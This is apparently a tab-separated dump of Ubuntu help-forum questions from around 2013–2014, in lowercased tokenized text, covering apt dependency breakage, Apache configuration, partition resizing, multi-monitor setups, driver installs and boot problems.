2.15-0ubuntu10.5 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/main amd64 packages 100 /var/lib/dpkg/status 2.15-0ubuntu10 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages libudev1 : installed : 198-0ubuntu11 candidate : 198-0ubuntu11.2 version table : 198-0ubuntu11.2 0 500 http : //security.ubuntu.com/ubuntu/ raring-security/main amd64 packages *** 198-0ubuntu11 0 100 /var/lib/dpkg/status and the output of apt-get check : apt-get check reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libc6-dev : depends : libc6 ( = 2.17-0ubuntu5.1 ) but 2.15-0ubuntu10.5 is installed depends : libc-dev-bin ( = 2.17-0ubuntu5.1 ) libudev1 : depends : libc6 ( > = 2.17 ) but 2.15-0ubuntu10.5 is installed e : unmet dependencies . try using -f. apt-get -u dist-upgrade has the same problem . any idea how i can resolve that ? /edit 2 apt-get -f install libc6-dev=2.17-0ubuntu5.1 libc6=2.17-0ubuntu5.1 libc-dev-bin=2.17-0ubuntu5.1 libudev1=198-0ubuntu11.2reading package lists ... done building dependency tree reading state information ... done libc6 is already the newest version . libc6-dev is already the newest version . libc6-dev set to manually installed . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libc6 : breaks : libc6 : i386 ( ! = 2.17-0ubuntu5.1 ) but 2.15-0ubuntu10.5 is to be installed libc6 : i386 : breaks : libc6 ( ! = 2.15-0ubuntu10.5 ) but 2.17-0ubuntu5.1 is to be installed libnih1 : predepends : libc6 ( < 2.16 ) but 2.17-0ubuntu5.1 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . \edit 3 apt-cache policy libnih1 libc6 libc6 : i386libnih1 : installed : 1.0.3-4ubuntu9.1 candidate : 1.0.3-4ubuntu9.1 version table : *** 1.0.3-4ubuntu9.1 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 100 /var/lib/dpkg/status 1.0.3-4ubuntu9 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages libc6 : installed : 2.17-0ubuntu5.1 candidate : 2.17-0ubuntu5.1 version table : *** 2.17-0ubuntu5.1 0 500 http : //security.ubuntu.com/ubuntu/ raring-security/main amd64 packages 100 /var/lib/dpkg/status 2.15-0ubuntu10.5 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/main amd64 packages 2.15-0ubuntu10 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages libc6 : i386 : installed : 2.15-0ubuntu10.5 candidate : 2.17-0ubuntu5.1 version table : 2.17-0ubuntu5.1 0 500 http : //security.ubuntu.com/ubuntu/ raring-security/main i386 packages *** 2.15-0ubuntu10.5 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main i386 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/main i386 packages 100 /var/lib/dpkg/status 2.15-0ubuntu10 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main i386 packages edit 4 apt-get remove libnih1 reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libc-dev-bin : depends : libc6 ( < 2.16 ) but 2.17-0ubuntu5.1 is to be installed libc6 : breaks : libc6 : i386 ( ! = 2.17-0ubuntu5.1 ) but 2.15-0ubuntu10.5 is to be installed libc6 : i386 : breaks : libc6 ( ! = 2.15-0ubuntu10.5 ) but 2.17-0ubuntu5.1 is to be installed libc6-dev : depends : libc-dev-bin ( = 2.17-0ubuntu5.1 ) libnih-dbus1 : depends : libnih1 ( = 1.0.3-4ubuntu9.1 ) but it is not going to be installed mountall : depends : libnih1 ( > = 1.0.0 ) but it is not going to be installed upstart : depends : libnih1 ( > = 1.0.0 ) but it is not going to be installed ureadahead : depends : libnih1 ( > = 1.0.0 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . edit 5 output of lsb_release : no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise output of apt-get install libc6=2.15-0ubuntu10.5 after removing raring repos and updating : apt-get install libc6=2.15-0ubuntu10.5 reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libc6-dev : depends : libc6 ( = 2.17-0ubuntu5.1 ) but 2.15-0ubuntu10.5 is to be installed depends : libc-dev-bin ( = 2.17-0ubuntu5.1 ) e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . edit 6 sudo apt-get install libc6-dev=2.15-0ubuntu10.5 libc6=2.15-0ubuntu10.5 reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : gir1.2-ubuntuoneui-3.0 libubuntuoneui-3.0-1 thunderbird-globalmenu use 'apt-get autoremove ' to remove them . suggested packages : glibc-doc the following packages will be downgraded : libc6 libc6-dev 0 upgraded , 0 newly installed , 2 downgraded , 0 to remove and 18 not upgraded . 3 not fully installed or removed . need to get 7,596 kb of archives . after this operation , 486 kb disk space will be freed . do you want to continue [ y/n ] ? y get:1 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main libc6-dev amd64 2.15-0ubuntu10.5 [ 2,941 kb ] get:2 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main libc6 amd64 2.15-0ubuntu10.5 [ 4,654 kb ] fetched 7,596 kb in 6s ( 1,095 kb/s ) preconfiguring packages ... dpkg : warning : downgrading libc6 from 2.17-0ubuntu5.1 to 2.15-0ubuntu10.5 . ( reading database ... 240709 files and directories currently installed . ) preparing to replace libc6 2.17-0ubuntu5.1 ( using ... /libc6_2.15-0ubuntu10.5_amd64.deb ) ... unpacking replacement libc6 ... dpkg : error processing /var/cache/apt/archives/libc6_2.15-0ubuntu10.5_amd64.deb ( -- unpack ) : './usr/share/lintian/overrides/libc6 ' is different from the same file on the system dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libc6_2.15-0ubuntu10.5_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
398129	terminal closes after entering a non-existing command	this seems to be a bug , but i 'm not sure which package to report it on . try this : open gnome-terminal shift-ctrl-t ( open a new tab ) type : foo foo & the tab is closed correct behavior would be command not found . this happens every time on gnome-terminal . on xterm ( without tabs of course ) it works randomly - maybe 2 of 3 times tried .
398131	how to select multiple directories in apache2.conf	i have the following file structure : /var/www /var/www/subdirectory i want to configure my apache2.conf with a directive that applies to both var/www and all it 's subdirectories and files . < directory `` var/www '' > only applies to the parent directory . direcotry `` var/www/*/ '' > only applies to the subdirectories . clarification i am using https : //github.com/h5bp/server-configs-apache to try and configure apache2.conf . i therefore want all the changes to apply to every public file served ( root dir and all other files ) . when i read https : //github.com/h5bp/server-configs-apache , i get the understanding that var/www should apply to all subdirs , however the options -indexes rule clearly does not work ( subdir indexes are visible ) . when i try var/www/* the indexes no longer show , but other rules are not applied to the root dir . i can isolate this issue : < directory `` var/www/* '' > < ifmodule mod_autoindex.c > options -indexes < /ifmodule > < /directory > disables listing of subdirs , whereas : < directory `` var/www '' > < ifmodule mod_autoindex.c > options -indexes < /ifmodule > < /directory > does not . how can i apply the directive to both , and all included files ?
398133	how to expand the ext4 partition of virtualized ubuntu running on top of centos/qemu ?	my company is running xen -- vms run on top of centos/qemu . recently a customer using virtualized ubuntu asked that his hdd space be increased . now , with windows , this is a joke . you type the new size into the hypervisor and , like magic , it shows up in the machine . ubuntu is not like this . if i increase the disk space in the hypervisor to , say , 80gb -- this change is recognized ... i am told that disk /dev/vda is equal to a larger amount ( 75.2gb ) when i run an fdisk on /dev/vda . here 's the issue -- i have a customer that wants to increase the hdd space on his virtualized ubuntu machine to 100gb . i 'm not sure of how to do this ! i type `` 100gb '' into the hypervisor . this shows up on fdisk . it also shows up when i do an fdisk -l. the issue is that i have two partitions `` in front '' of /dev/vda1 -- /dev/vda2 and /dev/vda5 . /dev/vda2 is 2095105 blocks and is id'ed as `` 5 '' . /dev/vda5 is 2095104 blocks and is id'ed at 82 ( swap ) . i was supossing that i could remove the last two partitions , grow the first , then replace them . problem is ... i can not do anything to a working partition because the machine is using it ! if this were a desktop i 'd simply boot from a live cd and try this . am i thinking along the right lines here ? my questions are this : first of all , is it even possible to enlarge a partiton that the system is running on ? second is this : if i can physically get near the server running this vdi can i just shut it down in xen and rebuild the partitions ? when i rebuild are there steps i must take -- like making sure that the start blocks are the same ? this partition has data on it and i 'd like to keep it intact ... though i told the customer that there was a big chance of data loss and to back up . folks , how would you go about doing this ? also , where does fstab fit into all of this ?
398136	ubuntu 12.04 does not boot after install	i have a new lenovo thinkpad e540 . i have successfully installed ubuntu 12.04 after the installation i receive the 'remove all ... and press any key to restart ' . no i receive the selection menu ( note that i erased the entire disk and now only ubuntu is installed ! ! ) , but after i clicked on ubuntu i got black screen with a blinking white underline character in the left top corner . i read about disabling the uefi mode in the bios , which i did , but i still got the same result . i reinstalled everything again . after choosing ubuntu in the grub menu the display stays black but i get to the login screen - > noticed by the sound of the drums ! ! the graphic card is a nvidia geforce gt 740m . error before the login screen :
398142	how to establish internet connection on ubuntu 12.04 running on hdd	after a long night trying to get windows running on my pc , i finally decided to install ubuntu ( there were some strange problems with the drivers ) . while installing ubuntu , i managed to establish an internet connection ( the setup usually sets up the connection ) , but after installing ubuntu ca n't establish a connection anymore . interestingly enough , after typing the ipv4 address manually , the system gets a connection without internet access . does anyone know how to get the internet working ?
398143	what log files should be examined to troubleshoot shutdown issues in relation to usb devices ?	i am currently having the following issue : close lid of laptop - laptop suspends open lid of laptop - laptop resumes select shutdown from menu - computer reboots suspend computer from menu - laptop suspends press key on keyboard - laptop resumes select shutdown from menu - computer shuts down suspend computer from menu - laptop suspends close laptop lid - no action open lid of laptop - laptop resumes select shutdown from menu - computer reboots i have looked at dmesg , kern.log , pm-suspend.log but not found any information that appears useful . while this may be a bug i would still like to know what log files i should be examining . update : 12/31/2013 this issue is related to having an anker usb 3.0 hub attached to the laptop . the problem does not happen unless the hub is attached . not sure why the usb hub would be an issue , but there is some interaction between this usb hub and suspend/resume . update : 1/2/2014 it appears that the issue is just using the usb 3.0 port . i am wondering how to check and see what settings a usb hub gets in regards to being able to wakeup the computer . perhaps the hub is getting set incorrectly on resume .
398144	blue yeti not working on xubuntu 12.04 , shows up in alsamixer	i 've been having lots of issues which i 've been able to fix pretty easily . this one is n't so easy . i cant use my microphone in any programs , even though it 's showing up and i 'm able to select it . when i try to call sound test service in skype it just skips through the playback , sometimes crashes while trying to select it again . audacity 's telling me : error while opening sound device . please check the input device settings and the project 's sample rate . i can record my usb camera 's microphone just fine . my microphone does not appear in pavucontrol at all . please help asap , i ca n't seem to find any working fixes googling .
398150	howto upgrade italc1.0 to 2.0 ?	i have a classroom with 40 ubuntu12.04 computers , which have italc1.0 . one teacher master , another student clients , i want to upgrade them all to italc2.0 , but no deb found , howto do this ? thanks .
398154	script to search directories for .deb files and copy them for another location	if i have a directory a that contain directories b , c , d i need a script that search directories b , c , d for .deb files and if found copy them to a location i choose . this script should reduce effort of hand search and copy . any idea ?
398155	how do you make clementine use the kittens background track ?	i found a site ( 1 ) that mentions there 's a kittens background track , but ca n't find it . if anyone knows , i 'd be very grateful : ) 1 : https : //delightlylinux.wordpress.com/2013/10/28/clementine-music-player-a-darling-music-manager/
398159	how to access localhost using rdesktop ?	installed android x86 in virtualbox on my host ubuntu 13.10 . i 'm trying to access the guest from the host through remote desktop but i cant access through either remmina or rdesktop but i 'm getting a `` connection closed '' error i enabled remote display in vbox with port 3389 ( also tried with 3390 ) i tried localhost:3389 and 127.0.0.1 but of no use please feel free to suggest any method or suggestions on how to enable remote desktop or display as i have never used remote display before . thanks in advance : )
398162	how to remove tribler in ubuntu 12.04lts ?	i installed tribler and also swift for tribler . i use ubuntu 12.04 lts . i want to completely remove them but i ca n't . they can not be seen in ubuntu software center . i ca n't find them . how can i remove tribler ? ? ? thanks
398165	install ns 2.34 on ubuntu 12.04	i have been trying to install ns 2.34 onto ubuntu 12.04 but it shows error while running command for gcc 4.3 version.it shows package not found . so which version of gcc is to be installed for installing ns 2.34 onto ubuntu 12.04
398170	how to setup multisite drupal7 using the ubuntu packages in 13.10	i want to install drupal 7 in such a way that i can have multiple websites using the same code base on one machine . i the past i have done that by manually downloading drupal 7 . however this time i would like to do it with the ubuntu packages . however , i am unable to find any documentation on how to do it . the closest i found is : https : //drupal.org/node/138889 however , that tutorial does not seem to be applicable anymore , since the location of a couple of files has changed . furthermore , the more i can do this without user interaction , the better . ( for example i prefer to install the packages myself compared to tasksel , because i can automate that with fabric/cuisine . )
398178	application to transfer music , photos , data to android phone ?	is there is any application in software center to connect android phone to ubuntu for connectivity just like mobogenie for windows
398180	wolf4sdl is not working	i have installed the wolf4sdl and game-data-installer packages under ubuntu 13.10 . it installed without '' errors '' and the icon is on the launchbar . when stated , the icon pulses and stops ; no program starts . ca n't seem to find a log file to help trouble shooting ... i need a howto ! ... i 'm not a linux command line master , just a grasshopper !
398181	ca n't stream mediatomb to samsung hdtv	i have installed mediatomb on my ubuntu 12.04 system , and can add content to it , but what do i have to do to my samsung hdtv to view it ? when i go to the media , it shows no device . please help ! ! carmen
398184	how to run s2both when closing the lid	i 'm using s2both from the uswsusp package to suspend to ram and disk at the same time . i like this method . how do i make it the default when closing the laptop lid ? i assume something runs pm-suspend when the lid gets closed . where does that invocation sit and how do i replace it by s2both ?
398186	copy all files whose hashes do n't match	i currently have a hash list ( known good ) of a selection of various files . i want to copy all files when their hashes do not appear in the hash list to a separate directory . i have got the md5deep section of the command working ( detecting all files which do n't appear on the list ) . i am working on the copy section of the command . looking at the cp man pages the -t option `` copy all source arguments into directory '' thus the ~/desktop/unknowjpg/ is the destination directory and ~/desktop/physical/output/jpg/ is the source . running the below command i get the error message `` cp : omitting directory `/home/daniel/desktop/physical/output/jpg/ ' '' md5deep -x hashes.txt jpg/*.jpg | cp -t ~/desktop/unknownjpg/ ~/desktop/physical/output/jpg/
398190	is there a way to install toad-for-mysql on ubuntu ?	i was wondering whether there is a way to install toad-for-mysql on ubuntu ? i ca n't find any appropriate solution . can somebody help to solve this issue . if it is n't possible , is there maybe a good alternative under linux ?
398192	xubuntu 13.10 : no hibernate button on logout dialog	i 've just installed xubuntu 13.10 . there is no `` hibernate '' button , only the `` suspend '' button . how can i activate it ? i had installed lubuntu 13.10 before , and the button was there and it did a correct hibernate and wakeup .
398193	ca n't enable 3rd monitor in ubuntu 13.10 fresh install	i recently installed 13.10 on my lenovo t430 laptop , which is closed and attached to a dock ( not a port replicator , a dock ) . before , i was using windows 7 and occasionally booting into 12.04 , and everything was working perfectly - i have three monitors attached to the dock and they were all working . i did a clean , fresh install of 13.10 , and now only a maximum of two monitors work at once . when i try to enable the third monitor , i get the following error : gdbus.error : org.gtk.gdbus.unmappedgerror.quark._gnome_2drr_2derror_2dquark.code2 : could not set the configuration for crtc 65 i tried plugging the monitor into a usb to dvi adapter , but nothing happened - the adapter was not recognized and only two of the monitors showed up in displays . i have done some research and everyone refers to xorg , but i have no clue what that is or how to properly screw around with it . the only thing i tried was installing nvidia-common . this caused my laptop to boot into a black screen , which was only fixed by removing it . any suggestions for getting all three monitors working at once ?
398195	can not get certain programs to `` show '' up	i am having trouble getting applications to `` show '' when selecting them from the sidebar . by `` show '' i mean when i click ubuntu one , ubuntu software center etc the applications start but are not visible on my screen . the only programs i can actually start are libreoffice , chromium and other browsers , home folder if i press alt+tab i can see they are running and when i select the program ( tab to them while holding down alt ) , the apps wo n't switch . i can not figure out why they are not visibly showing up . this seems to have happened after trying to update nvidia drivers . i 've tried to open terminal and remove the update but terminal will not allow me to type any commands . i 'm on 12.04 lts if anyone has any thoughts as to what may be going on that would be great . this seems to be vague information but i do n't know how else to capture the issue . maybe i can provide screenshots that would be more helpful ( if needed ) .
398199	problem with terminal after following instructions : ' [ how to ] connect your android ice cream sandwich phone to ubuntu for file access '	after following the instructions my terminal is constantly spewing out alias : command not found alias android-disconnect=”fusermount -u /media/galaxy” alias : command not found alias android-connect=”mtpfs -user_allow_other /media/galaxy” alias : command not found alias : command not found alias android-disconnect=”fusermount -u /media/galaxy” alias : command not found alias android-connect=”mtpfs -user_allow_other /media/galaxy” alias : command not found endlessly what to do ?
398200	how to install 'rar ' ( from command line only )	my /etc/apt/sources.list ( ubuntu 13.10 ) contains : deb http : // ... saucy main universe multiverse deb-src http : // ... saucy main universe multiverse according to other posts such as this , the 'multiverse ' part is important . although this is there , sudo apt-get update ; sudo apt-get install rar returns e : package rar has no installation candidate . what am i missing ? note : this is actually ubuntu 13.10 running on an android 4.4.2 smartphone , which is one of the reasons why i am limited to the terminal to solve this problem .
398201	firefox renders images dark	i have a peculiar problem on ubuntu ( i 've also noticed it on variants such as mint ) . when i use firefox , images are rendered notably darker than on chromium/chrome . for some things this is ok , but it 's quite disruptive other times . is something in particular causing this ?
398202	ubuntu 12.04 ( 64bit ) guest as dual-boot on virtualbox under mac os x	i have an ubuntu installation on a partition on my mac and i would like to boot ubuntu from within mac os x using virtualbox . when i want to start the machine i only get error loading operating system i followed more or less these instructions for the setup . i have also tried a ton of different settings for the virtual machine ( ide vs sata , io-apic , etc . ) , none of them bringing me closer . here is a summary : macbook pro 2009 host : mac os x mavericks on /des/disk0s2 guest : ubuntu 12.04 lts 64-bit on /des/disk0s4 sudo chmod 777 /dev/disk0s4
398203	problem with installing nvidia driver 319	i have ubuntu ver . 12.04 and nvidia ver . 304 . after i updated my driver to 319 which is recommended in additional driver , i got stuck in the booting screen with something like : apparmor etc . ( black screen with yellow code ) so i had to reinstall my os . please could you help me how to install it correctly without error , because i am new with linux . thank you very much !
398205	ubuntu boot issues	the first thing i did was go to ubuntu.com/downloads , and downloaded ubuntu 13.10 64-bit . next i extracted the file onto my desktop in its own folder ( and then extracted onto a disc also ) . finally i installed it from the file and said it was ready for me to reboot . once i rebooted i received a windows error . here is the error i get from my computer after installing ubuntu and restarting : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . 2 . choose your language settings , and then click `` next '' . 3 . click `` repair your computer `` if you do n't have this disc , contact your system administrator it computer manufacturer for assistance . file : \ubuntu\winboot\wubildr.mbr status 0xc000000f info : the application or operating system could n't be loaded because a required file is missing or contains errors . i have uninstalled and re-installed ubuntu about 15 times and downloaded it from ubuntu.com about 5 times in addition , i have recently been giving this error while installing ubuntu 13.10 and 12.04 an error occurred : permission denied for more information , please see the log file : c : /users/ ( me ) /appdata/local/temp/wubi-13.10-rev284.log '' computer specs : ⠀processor : amd a8-4500m apu with radeon ( tm ) hd graphics ⠀ram : 4.00gb ⠀graphics : amd radeon hd 7640g ⠀gaming graphics : 2021mb total available graphics memory ⠀hard drive : 444gb i did not make another partition on my computer so if that is the problem , then please give me instructions on how to do so !
398213	does ubuntu software center download 64bit apps ?	noob question : when using the 64bit version of ubuntu ( xubuntu in this case ) and i install something through the software center , will it get the 64bit app for me ?
398215	setup a third monitor in kde	i had two monitors on one video card running just fine . but i got greedy and added a second video card and a third monitor . nvidia-setup would n't allow me to add the second video card to the twin-view of the first two , so i turned it into three separate x displays . now when i bring up the display , i can see three monitors glowing , i can move the cursor to any of the three monitors , but kde refuses to have anything to do with the second and third monitor . right click on a window and choose `` move to screen '' and it lists three screens , but actually choosing one of the others does n't actually move the window . i ca n't drag them to another screen and i ca n't get new windows to start on those other monitors . essentially i 've turned a working two monitor setup into a one monitor + two glowing things setup . here 's my xorg.conf # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 304.88 ( buildd @ panlong ) thu jul 11 10:40:14 utc 2013 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 1920 0 screen 1 `` screen1 '' leftof `` screen0 '' screen 2 `` screen2 '' rightof `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` ysp eq276w dvi '' horizsync 15.0 - 99.0 vertrefresh 23.0 - 76.0 option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor1 '' vendorname `` unknown '' modelname `` dell st2410 '' horizsync 30.0 - 83.0 vertrefresh 50.0 - 76.0 option `` dpms '' endsection section `` monitor '' # horizsync source : unknown , vertrefresh source : unknown identifier `` monitor2 '' vendorname `` unknown '' modelname `` viewsonic va2431 series '' horizsync 0.0 - 0.0 vertrefresh 0.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 430 '' busid `` pci:1:0:0 '' screen 0 endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 430 '' busid `` pci:1:0:0 '' screen 1 endsection section `` device '' identifier `` device2 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 620 '' busid `` pci:2:0:0 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` metamodes '' `` dfp-1 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen2 '' device `` device2 '' monitor `` monitor2 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` metamodes '' `` nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection
398217	unhappy with donation process at ubuntu.com download page	my question is with contributing to ubuntu : i tried to donate $ 25 this morning before downloading 12.04.3 lts ( you kinda force people to it ) . i wanted to donate , as i 've done before , without any other returns than the privilege of using the software . i thought i was entering billing info so that my credit card would be charged directly , but instead it appears the site forces me to go through paypal ! while i do have a paypal account , i do n't like to use it much . so i ended up canceling the contribution . i sure do n't know why ubuntu sets up the donation feature thusly - it turns me off . if you want people to contribute voluntarily , make it easy for them and not force one to use a certain payment method .
398218	.flac files on ipod classic ?	i 'm super new to linux , being a windows user my whole life , and i 'm really trying to learn as much as i can . when i made the switch , i took my 42+ gb collection of music ( previously handled in itunes ) with me , with over 500 songs in .wav format . wanting tag support , i 've converted all of these files to .flac successfully through soundconverter , but just now found out that my ipod classic wo n't play .flac files ! so , now i 'm looking for a way to get these files onto my ipod and play them . i do n't care if i have to update its firmware , convert these .flac files to apple lossless or any other method , whether through a program or the terminal , all i care about is i want to retain tag support and have them in a lossless format . any suggestions ? ?
398219	does having 4 installed os affect my ram usage ?	i installed 4 os 's ( ubuntu 13.04 , ubuntu 13.10 , windows 8 , windows 8.1 in logical partition ) on my hdd . does this configuration may affect my ram in some other ways ?
398224	matlab and simulink	i recently bought a mac and installed matlab on it . when i opened it i found that simulink was not installed . is there a package i can download that belongs to simulink ? your help is appreciated .
398226	why intel graphic card is unknown in details section under settings ? how to install it ?	when i type sudo lshw -c display i get the following information : *-display description : vga compatible controller product : 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 03 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:42 memory : fe400000-fe7fffff memory : e0000000-efffffff ioport : cc00 ( size=8 ) in details section in ubuntu i see unknown is written in front of the graphic . how to install my graphic card ?
398227	missing ia32-libs	i 'm trying to install teamviewer 9 from deb file however it says it needs ia32-libs so it wo n't install : i tried to do some fix with sudo apt-get dist-upgrade but : $ sudo apt-get install ia32-libs-multiarch reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ia32-libs-multiarch : i386 : depends : libglapi-mesa : i386 depends : libglu1-mesa : i386 but it is not going to be installed depends : libqt4-opengl : i386 but it is not going to be installed recommends : libgl1-mesa-glx : i386 recommends : libgl1-mesa-dri : i386 e : unable to correct problems , you have held broken packages . what is the work-around for this ?
398232	how to revert packages to official release ?	ubuntu 13.10 , i have added test repo and upgraded system . now not everything is working correctly . how to revert packages to official release versions ?
398235	trying to get a 3tb segate to work in ubuntu 32bit 12.04 3ware controller	i have a 3tb seagate drive which i am able to format in another machine with no issues , unfortunately it only shows up as 746.5 gb in another machine which i want to use it in for data running 32bit 12.04. when i run gdisk i get the following : sudo gdisk -l /dev/sdc [ sudo ] password for dadmin : gpt fdisk ( gdisk ) version 0.8.1 warning ! disk size is smaller than the main header indicates ! loading secondary header from the last sector of the disk ! you should use 'v ' to verify disk integrity , and perhaps options on the experts ' menu to repair the disk . caution : invalid backup gpt header , but valid main header ; regenerating backup header from main header . warning ! one or more crcs do n't match . you should repair the disk ! partition table scan : mbr : protective bsd : not present apm : not present gpt : damaged **************************************************************************** caution : found protective or hybrid mbr and corrupt gpt . using gpt , but disk verification and recovery are strongly recommended . **************************************************************************** disk /dev/sdc : 1565565872 sectors , 746.5 gib logical sector size : 512 bytes disk identifier ( guid ) : 82ece0eb-d746-49a3-b0de-dd505944c7de partition table holds up to 128 entries first usable sector is 34 , last usable sector is 5860533134 partitions will be aligned on 2048-sector boundaries total free space is 2925 sectors ( 1.4 mib ) number start ( sector ) end ( sector ) size code name 1 2048 1334452223 636.3 gib 8300 2 1334452224 2686132223 644.5 gib 8300 3 2686132224 5860532223 1.5 tib 8300 dadmin @ alexandria : ~ $ sudo gdisk -lv /dev/sdc gpt fdisk ( gdisk ) version 0.8.1 so it sees the partitions but i have no idea where to start to make this install use that drive for data . the drive is connected to a 3ware 8506-12 controller which also only see the drive as under 800 gigs . will i be able to use the drive if the controller only sees it as 800 gigs ?
398236	oom killer not working ?	for what i understand , when the system is close to have no free memory , the kernel should start to kill processes to regain some memory . but in my system this does not happen at all . suppose a simple script that just allocates much more memory than the available in the system ( an array with millions of strings , for example ) . if i run a script like this ( as a normal user ) , it just gets all the memory until the system completely freezes ( only sysrq reisub works ) . the weird part here is that when the computer freezes , the hard drive led turns on and stays that way until the computer is rebooted , either if i have a swap partition mounted or not ! so my questions are : is this behavior normal ? it 's odd that an application executed as a normal user can just crash the system this way ... is there any way i can make ubuntu just kill automatically those applications when they get too much ( or the most ) memory ? additional information ubuntu 12.04.3 kernel 3.5.0-44 ram : ~3.7gb from 4gb ( shared with graphics card ) . * $ tail -n+1 /proc/sys/vm/overcommit_* == > /proc/sys/vm/overcommit_memory < == 0 == > /proc/sys/vm/overcommit_ratio < == 50 $ cat /proc/swaps filename type size used priority /dev/dm-1 partition 4194300 344696 -1
398237	can i install opencpn , navigation software on a nexus 4 if i onstall the new ubuntu os app	now that ubuntu os can be loaded onto a nexus 4 , can opencpn , the navigation program , be loaded using ubuntu
398238	can i instal ubuntu from the command line ?	i 'm trying to install ubuntu . i 've done this a thousand times and usually it 's fine . however , this time it has got the screen fonts all far too large . so i ca n't actually get the mouse to a lot of the buttons and options , making it impossible to install . i 've had some minimal success by rotating the display by 90 degrees which lets me get to a few options , but this ( a ) makes my head hurt and ( b ) only gets me so far . so i 'd like a way to install using the command line . how do i do this ?
398239	ca n't re-install wubi or ubuntu	i had ubuntu and it stopped coming up on boot . i have tried to save root.disk file on external hard drive three times , it freezes on 62 % . i tried zipping file , it freezes computer about half way . i have deleted anything to do with ubuntu and still the wubi install gives me an error and says to go to a log file that does not exist . i have tried the cd , which i downloaded and on install when it goes to the box of which i am to choose what space to put it in , it gives me an error and tells me to choose root file from parameters . anything i choose it reverts back to original box . i ca n't install . help !
398243	i copied all the data from my old 500gb hard drive to my new 1tb one but the computer still shows that i only have 500gb . help !	so i copied everything from my old 500gb hard drive onto my new 1tb ( 1000gb ) hard drive but my computer shows that i still only have 500gb memory . this is probably because i copied that information over ... please tell me there is a way to make my computer realize it has 1tb .
398246	intel graphic 3rd with 12.4 `` nomodeset '' working but ?	if i 'm booting with `` nomodeset '' then ca n't change brightness/login/logout/suspend/resume ..etc . accidentally booted once without `` nomodeset '' everything was working ( brightness/login/logout/suspend/resume ) . i tried alot of fixes like `` acpi_backlight=vendor '' in kernel option , but without any success : - ( my system : ubuntu 12.4.3 ( 64bit ) on hp 250 ( preinstalled with ubuntu ) lspci -nnk | grep -a5 vga 00:02.0 vga compatible controller [ 0300 ] : **intel corporation 3rd gen core processor graphics controller** [ 8086:0166 ] ( rev 09 ) subsystem : hewlett-packard company device [ 103c:1854 ] kernel modules : i915 00:16.0 communication controller [ 0780 ] : intel corporation 7 series/c210 series chipset family mei controller # 1 [ 8086:1e3a ] ( rev 04 ) subsystem : hewlett-packard company device [ 103c:1854 ] kernel driver in use : mei best
